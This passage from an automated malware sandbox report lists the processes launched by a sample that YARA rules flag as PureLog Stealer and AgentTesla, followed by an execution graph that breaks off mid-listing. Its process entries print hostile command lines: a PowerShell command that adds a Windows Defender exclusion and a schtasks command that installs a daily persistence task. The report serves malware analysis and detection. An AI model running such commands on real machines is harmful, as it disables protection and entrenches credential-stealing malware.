                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:35
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:12
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0xc10000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:433'152 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:36
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:12
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0xb40000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:187'904 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:37
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:12
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:38
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:12
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:39
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:19
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb730000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:496'640 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:40
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:21
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:138'056 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:41
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:21
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:174'408 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:42
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:21
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:154'952 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:43
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:21
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:1'348'608 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:7CB21DCAD3B21967F4E5DF9CF3F75EC0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:44
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:22
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\Public\Libraries\Juqmtmya.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\Public\Libraries\Juqmtmya.PIF"
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:1'226'240 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:2EF70D96354CC04D9168E8F69E7B17A0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:46
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:25
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:68'096 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:47
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:25
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:1'425'408 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002F.00000003.1847868691.0000000000891000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002F.00000002.2058811491.00000000050D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002F.00000002.2046318436.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002F.00000002.2060060540.0000000005740000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000002.2051386089.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000002F.00000002.2051386089.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002F.00000002.2058173274.0000000003E55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        Execution Coverage:5.6%
                                                                                                                                                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                                        Signature Coverage:37.3%
                                                                                                                                                                                                                                                                                                                                                                                                                                        Total number of Nodes:657
                                                                                                                                                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:27
                                                                                                                                                                                                                                                                                                                                                                                                                                        execution_graph 16724 7ff7d1528d80 16725 7ff7d1528da4 16724->16725 16726 7ff7d1528db6 16725->16726 16727 7ff7d1528dbf Sleep 16725->16727 16728 7ff7d1528ddb _amsg_exit 16726->16728 16735 7ff7d1528de7 16726->16735 16727->16725 16729 7ff7d1528e38 16728->16729 16730 7ff7d1528e56 _initterm 16729->16730 16731 7ff7d1528e3c 16729->16731 16733 7ff7d1528e73 _IsNonwritableInCurrentImage 16729->16733 16730->16733 16741 7ff7d15237d8 GetCurrentThreadId OpenThread 16733->16741 16735->16729 16735->16731 16740 7ff7d15293b0 SetUnhandledExceptionFilter 16735->16740 16740->16735 16774 7ff7d15204f4 16741->16774 16743 7ff7d1523839 HeapSetInformation RegOpenKeyExW 16744 7ff7d152e9f8 RegQueryValueExW RegCloseKey 16743->16744 16745 7ff7d152388d 16743->16745 16747 7ff7d152ea41 GetThreadLocale 16744->16747 16746 7ff7d1525920 VirtualQuery VirtualQuery 16745->16746 16748 7ff7d15238ab GetConsoleOutputCP GetCPInfo 16746->16748 16760 7ff7d1523919 16747->16760 16748->16747 16749 7ff7d15238f1 memset 16748->16749 16749->16760 16750 7ff7d1524d5c 391 API calls 16750->16760 16751 7ff7d1523948 _setjmp 16751->16760 16752 7ff7d152eb27 _setjmp 16752->16760 16753 7ff7d1513240 166 API calls 16753->16760 16754 7ff7d15201b8 6 API calls 16754->16760 16755 7ff7d1524c1c 166 API calls 16755->16760 16756 7ff7d152eb71 _setmode 16756->16760 16757 7ff7d1538530 370 API calls 16757->16760 16758 7ff7d15286f0 182 API calls 16758->16760 16759 7ff7d1520580 12 API calls 16761 7ff7d152398b GetConsoleOutputCP GetCPInfo 16759->16761 16760->16744 16760->16750 16760->16751 16760->16752 16760->16753 16760->16754 16760->16755 16760->16756 16760->16757 16760->16758 16760->16759 16762 7ff7d15258e4 EnterCriticalSection LeaveCriticalSection 16760->16762 16764 7ff7d151be00 647 API calls 16760->16764 16765 7ff7d151df60 481 API calls 16760->16765 16766 7ff7d15258e4 EnterCriticalSection LeaveCriticalSection 16760->16766 16763 7ff7d15204f4 GetModuleHandleW GetProcAddress SetThreadLocale 16761->16763 16762->16760 16763->16760 16764->16760 16765->16760 16767 7ff7d152ebbe GetConsoleOutputCP GetCPInfo 16766->16767 16768 7ff7d15204f4 GetModuleHandleW GetProcAddress SetThreadLocale 16767->16768 16769 7ff7d152ebe6 16768->16769 16770 7ff7d151be00 647 API calls 16769->16770 16771 7ff7d1520580 12 API calls 16769->16771 16770->16769 16772 7ff7d152ebfc GetConsoleOutputCP GetCPInfo 16771->16772 16773 7ff7d15204f4 GetModuleHandleW GetProcAddress SetThreadLocale 16772->16773 16773->16760 16775 7ff7d1520504 16774->16775 16776 7ff7d152051e GetModuleHandleW 16775->16776 16777 7ff7d152054d GetProcAddress 16775->16777 16778 7ff7d152056c SetThreadLocale 16775->16778 16776->16775 16777->16775 21987 7ff7d1516be0 21988 7ff7d151cd90 166 API calls 21987->21988 21989 7ff7d1516c04 21988->21989 21990 7ff7d15341a2 21989->21990 21991 7ff7d1516c13 _pipe 21989->21991 21993 7ff7d1513278 166 API calls 21990->21993 21994 7ff7d1516c32 21991->21994 22024 7ff7d1516e26 21991->22024 21992 7ff7d1513278 166 API calls 21992->21990 21995 7ff7d15341bc 21993->21995 21997 7ff7d1516df1 21994->21997 22038 7ff7d151affc _dup 21994->22038 21996 7ff7d153e91c 198 API calls 21995->21996 21998 7ff7d15341c1 21996->21998 22000 7ff7d1513278 166 API calls 21998->22000 22002 7ff7d15341d2 22000->22002 22001 7ff7d1516c7d 22001->21990 22004 7ff7d151b038 _dup2 22001->22004 22003 7ff7d153e91c 198 API calls 22002->22003 22005 7ff7d15341d7 22003->22005 22006 7ff7d1516c93 22004->22006 22007 7ff7d1513278 166 API calls 22005->22007 22006->22005 22008 7ff7d151d208 _close 22006->22008 22009 7ff7d15341e4 22007->22009 22010 7ff7d1516ca4 22008->22010 22011 7ff7d153e91c 198 API calls 22009->22011 22040 7ff7d151be00 22010->22040 22013 7ff7d15341e9 22011->22013 22015 7ff7d1516d07 22017 7ff7d151b038 _dup2 22015->22017 22016 7ff7d1516ccf _get_osfhandle DuplicateHandle 22016->22015 22018 7ff7d1516d11 22017->22018 22018->22005 22019 7ff7d151d208 _close 22018->22019 22020 7ff7d1516d22 22019->22020 22021 7ff7d1516e21 22020->22021 22023 7ff7d151affc _dup 22020->22023 22022 7ff7d153e91c 198 API calls 22021->22022 22022->22024 22025 7ff7d1516d57 22023->22025 22024->21992 22025->21998 22026 7ff7d151b038 _dup2 22025->22026 22027 7ff7d1516d6c 22026->22027 22027->22005 22028 7ff7d151d208 _close 22027->22028 22029 7ff7d1516d7c 22028->22029 22030 7ff7d151be00 647 API calls 22029->22030 22031 7ff7d1516d9c 22030->22031 22032 7ff7d151b038 _dup2 22031->22032 22033 7ff7d1516da8 22032->22033 22033->22005 22034 7ff7d151d208 _close 22033->22034 22035 7ff7d1516db9 22034->22035 22035->22021 22036 7ff7d1516dc1 22035->22036 22036->21997 22074 7ff7d1516e60 22036->22074 22039 7ff7d151b018 22038->22039 22039->22001 22041 7ff7d151be1b 22040->22041 22052 7ff7d1516cc4 22040->22052 22042 7ff7d151be47 memset 22041->22042 22043 7ff7d151be67 22041->22043 22041->22052 22151 7ff7d151bff0 22042->22151 22045 7ff7d151be73 22043->22045 22047 7ff7d151bf29 22043->22047 22048 7ff7d151beaf 22043->22048 22046 7ff7d151be92 22045->22046 22050 7ff7d151bf0c 22045->22050 22058 7ff7d151bea1 22046->22058 22078 7ff7d151c620 GetConsoleTitleW 22046->22078 22049 7ff7d151cd90 166 API calls 22047->22049 22048->22052 22055 7ff7d151bff0 185 API calls 22048->22055 22053 7ff7d151bf33 22049->22053 22189 7ff7d151b0d8 memset 22050->22189 22052->22015 22052->22016 22053->22048 22056 7ff7d151bf70 22053->22056 22059 7ff7d15188a8 _wcsicmp 22053->22059 22055->22052 22068 7ff7d151bf75 22056->22068 22249 7ff7d15171ec 22056->22249 22058->22048 22063 7ff7d151af98 2 API calls 22058->22063 22062 7ff7d151bf5a 22059->22062 22060 7ff7d151bf1e 22060->22048 22062->22056 22066 7ff7d1520a6c 273 API calls 22062->22066 22063->22048 22064 7ff7d151bfa9 22064->22048 22065 7ff7d151cd90 166 API calls 22064->22065 22067 7ff7d151bfbb 22065->22067 22066->22056 22067->22048 22069 7ff7d152081c 166 API calls 22067->22069 22070 7ff7d151b0d8 194 API calls 22068->22070 22069->22068 22071 7ff7d151bf7f 22070->22071 22071->22048 22122 7ff7d1525ad8 22071->22122 22076 7ff7d1516e6d 22074->22076 22075 7ff7d1516eb9 22075->21997 22076->22075 22077 7ff7d1525cb4 7 API calls 22076->22077 22077->22076 22080 7ff7d151c675 22078->22080 22084 7ff7d151ca2f 22078->22084 22079 7ff7d152c5fc GetLastError 22079->22084 22081 7ff7d151ca40 17 API calls 22080->22081 22089 7ff7d151c69b 22081->22089 22082 7ff7d1513278 166 API calls 22082->22084 22083 7ff7d152855c ??_V@YAXPEAX 22083->22084 22084->22079 22084->22082 22084->22083 22085 7ff7d151c9b5 22088 7ff7d152855c ??_V@YAXPEAX 22085->22088 22086 7ff7d151c978 towupper 22113 7ff7d151c964 22086->22113 22087 7ff7d152855c ??_V@YAXPEAX 22107 7ff7d151c762 22087->22107 22108 7ff7d151c855 22088->22108 22089->22084 22089->22085 22090 7ff7d151d3f0 223 API calls 22089->22090 22089->22107 22092 7ff7d151c741 22090->22092 22091 7ff7d153ec14 173 API calls 22091->22107 22094 7ff7d151c74d 22092->22094 22097 7ff7d151c8b5 wcsncmp 22092->22097 22093 7ff7d151c872 22095 7ff7d152855c ??_V@YAXPEAX 22093->22095 22100 7ff7d151bd38 207 API calls 22094->22100 22094->22107 22098 7ff7d151c87c 22095->22098 22096 7ff7d152c6b8 SetConsoleTitleW 22096->22093 22097->22094 22097->22107 22101 7ff7d1528f80 7 API calls 22098->22101 22099 7ff7d151c83d 22255 7ff7d151cb40 22099->22255 22100->22107 22102 7ff7d151c88e 22101->22102 22102->22058 22104 7ff7d151c78a wcschr 22104->22107 22106 7ff7d152291c 8 API calls 22106->22107 22107->22084 22107->22087 22107->22099 22107->22104 22107->22106 22109 7ff7d151ca25 22107->22109 22111 7ff7d152c684 22107->22111 22107->22113 22116 7ff7d151ca2a 22107->22116 22108->22093 22108->22096 22112 7ff7d1513278 166 API calls 22109->22112 22114 7ff7d1513278 166 API calls 22111->22114 22112->22084 22113->22079 22113->22085 22113->22086 22113->22091 22113->22107 22115 7ff7d15189c0 23 API calls 22113->22115 22118 7ff7d151ca16 GetLastError 22113->22118 22114->22084 22115->22113 22117 7ff7d1529158 7 API calls 22116->22117 22117->22084 22120 7ff7d1513278 166 API calls 22118->22120 22121 7ff7d152c675 22120->22121 22121->22084 22123 7ff7d151cd90 166 API calls 22122->22123 22124 7ff7d1525b12 22123->22124 22125 7ff7d1525b8b 22124->22125 22126 7ff7d151cb40 166 API calls 22124->22126 22127 7ff7d1528f80 7 API calls 22125->22127 22128 7ff7d1525b26 22126->22128 22129 7ff7d151bf99 22127->22129 22128->22125 22130 7ff7d1520a6c 273 API calls 22128->22130 22129->22058 22131 7ff7d1525b43 22130->22131 22132 7ff7d1525bb8 22131->22132 22133 7ff7d1525b48 GetConsoleTitleW 22131->22133 22134 7ff7d1525bbd GetConsoleTitleW 22132->22134 22135 7ff7d1525bf4 22132->22135 22136 7ff7d151cad4 172 API calls 22133->22136 22137 7ff7d151cad4 172 API calls 22134->22137 22138 7ff7d1525bfd 22135->22138 22139 7ff7d152f452 22135->22139 22140 7ff7d1525b66 22136->22140 22142 7ff7d1525bdb 22137->22142 22138->22125 22145 7ff7d1525c1b 22138->22145 22146 7ff7d152f462 22138->22146 22141 7ff7d1523c24 166 API calls 22139->22141 22271 7ff7d1524224 InitializeProcThreadAttributeList 22140->22271 22141->22125 22331 7ff7d15196e8 22142->22331 22149 7ff7d1513278 166 API calls 22145->22149 22148 7ff7d1513278 166 API calls 22146->22148 22147 7ff7d1525b7f 22150 7ff7d1525c3c SetConsoleTitleW 22147->22150 22148->22125 22149->22125 22150->22125 22152 7ff7d151c01c 22151->22152 22177 7ff7d151c0c4 22151->22177 22153 7ff7d151c022 22152->22153 22154 7ff7d151c086 22152->22154 22155 7ff7d151c030 22153->22155 22156 7ff7d151c113 22153->22156 22157 7ff7d151c144 22154->22157 22170 7ff7d151c094 22154->22170 22158 7ff7d151c039 wcschr 22155->22158 22159 7ff7d151c053 22155->22159 22156->22159 22164 7ff7d151ff70 2 API calls 22156->22164 22160 7ff7d151c151 22157->22160 22187 7ff7d151c1c8 22157->22187 22158->22159 22161 7ff7d151c301 22158->22161 22162 7ff7d151c058 22159->22162 22163 7ff7d151c0c6 22159->22163 22185 7ff7d151c211 22159->22185 22537 7ff7d151c460 22160->22537 22165 7ff7d151cd90 166 API calls 22161->22165 22172 7ff7d151ff70 2 API calls 22162->22172 22173 7ff7d151c073 22162->22173 22168 7ff7d151c0cf wcschr 22163->22168 22163->22173 22164->22159 22188 7ff7d151c30b 22165->22188 22167 7ff7d151c460 183 API calls 22167->22170 22171 7ff7d151c1be 22168->22171 22168->22173 22170->22167 22170->22177 22174 7ff7d151cd90 166 API calls 22171->22174 22172->22173 22175 7ff7d151c460 183 API calls 22173->22175 22173->22177 22174->22187 22175->22173 22176 7ff7d151c460 183 API calls 22176->22177 22177->22043 22178 7ff7d151c285 22183 7ff7d151b6b0 170 API calls 22178->22183 22178->22185 22179 7ff7d151b6b0 170 API calls 22179->22159 22180 7ff7d151d840 178 API calls 22180->22188 22181 7ff7d151ff70 2 API calls 22181->22177 22182 7ff7d151d840 178 API calls 22182->22187 22186 7ff7d151c2ac 22183->22186 22184 7ff7d151c3d4 22184->22173 22184->22179 22184->22185 22185->22181 22186->22173 22186->22185 22187->22177 22187->22178 22187->22182 22187->22185 22188->22177 22188->22180 22188->22184 22188->22185 22190 7ff7d151ca40 17 API calls 22189->22190 22206 7ff7d151b162 22190->22206 22191 7ff7d151b2e1 22193 7ff7d151b2f7 ??_V@YAXPEAX 22191->22193 22194 7ff7d151b303 22191->22194 22192 7ff7d151b1d9 22197 7ff7d151cd90 166 API calls 22192->22197 22212 7ff7d151b1ed 22192->22212 22193->22194 22196 7ff7d1528f80 7 API calls 22194->22196 22195 7ff7d1521ea0 8 API calls 22195->22206 22198 7ff7d151b315 22196->22198 22197->22212 22198->22046 22198->22060 22200 7ff7d151b228 _get_osfhandle 22202 7ff7d151b23f _get_osfhandle 22200->22202 22200->22212 22201 7ff7d152bfef _get_osfhandle SetFilePointer 22203 7ff7d152c01d 22201->22203 22201->22212 22202->22212 22205 7ff7d15233f0 _vsnwprintf 22203->22205 22204 7ff7d151affc _dup 22204->22212 22208 7ff7d152c038 22205->22208 22206->22191 22206->22192 22206->22195 22206->22206 22207 7ff7d15201b8 6 API calls 22207->22212 22213 7ff7d1513278 166 API calls 22208->22213 22209 7ff7d152c1c3 22210 7ff7d15233f0 _vsnwprintf 22209->22210 22210->22208 22211 7ff7d151d208 _close 22211->22212 22212->22191 22212->22200 22212->22201 22212->22204 22212->22207 22212->22209 22212->22211 22214 7ff7d152c060 22212->22214 22216 7ff7d151b038 _dup2 22212->22216 22217 7ff7d152c246 22212->22217 22220 